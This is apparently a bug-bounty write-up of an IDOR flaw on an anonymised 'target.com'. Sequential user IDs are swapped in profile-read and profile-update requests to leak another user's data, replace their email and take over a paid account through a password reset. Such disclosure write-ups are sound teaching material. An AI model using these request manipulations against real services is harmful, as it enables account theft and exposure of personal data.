.png)
4 years ago
172 BOOK THIS SPACE FOR AD
ARTICLE ADSo, let’s call the target as target.com. I started with testing the User Authentication process as I like to do Authentication Bypass on an application. But unluckily, I couldn’t get success here. As the application has paid subscription, I created a free account which was later asking to Purchase Subscription for accessing the Content. After roaming across with the application, I came to the User Profile section which has the request like this:
GET /user/152453 HTTP/1.1Host: target.com
Cookies: session=xxxxxxxx
Sent this request to the Repeater and replace with the Victim’s UserID (152157) which was easily guessable due sequential UserID. The response I got back from the application was such a gem:
HTTP/1.1 200 OK {“user”:“id”:152157,”email”:”victim@test.com”,”name”:”Victim”,
”membership”:1,”created_at”:”2020–02–17 18:45:01”, ”updated_at”:”2020–02–17 18:45:01", ”status”:1, ”device_id”:null, ”mob_id”:null,”phone”:”1234567890",”dob”:”1998-10–14”,”access”:1}
I was able to get any user’s account information. But the fight has not completed yet. I need User’s Password to access those accounts. On updating the User Profile, I found /updateuserprofile endpoint which has the request like this:
POST /updateuserprofile/152453 HTTP/1.1Host: target.com
Cookies: session=xxxxxxxx{“name”:”Attacker”,”email”:”attacker@test.com”,”phone”:”1234567890",”dob”:”2000–01–01"}
Quickly sent the request to Repeater and replaced the Attacker’s UserID i.e.152453 with Victim’s ID i.e.152157 and got the result what I wanted:
HTTP/1.1 200 OK{“status”:”User Data Successfully Updated”,“user”:“id”:152157, ”email”:”attacker@test.com”,”name”:”Attacker”,”membership”:1”created_at”:”2020–02–17 18:45:01",”updated_at”:”2020–06–28 15:22:49",”status”:1,”device_id”:null,”mob_id”:null,”phone”:”1234567890",”dob”:”2000–01–01",”access”:1}
I successfully updated Victim’s Email address and further details with Attacker’s. Then I logged out and Requested a New Password on Attacker’s Email and YESS!!!.. I Successfully Logged in to the Paid Account and also able to access all the paid content. So here’s my way to Account Takeover of any user on a target application. I also found some other ways to get Paid Membership for user but this one was more interesting and easy.
Takeaways:
Mapping the application always plays a big role in crawling endpoints.Always try to increase the impact of the vulnerability.Explanation and Practice Lab for IDOR : PortSwiggerIf you enjoyed reading my article do clap and follow on Medium and Twitter:
Twitter: https://twitter.com/_p4nk4j
LinkedIn: https://www.linkedin.com/in/p4nk4jv/
Bengali (Bangladesh) · 
English (United States) ·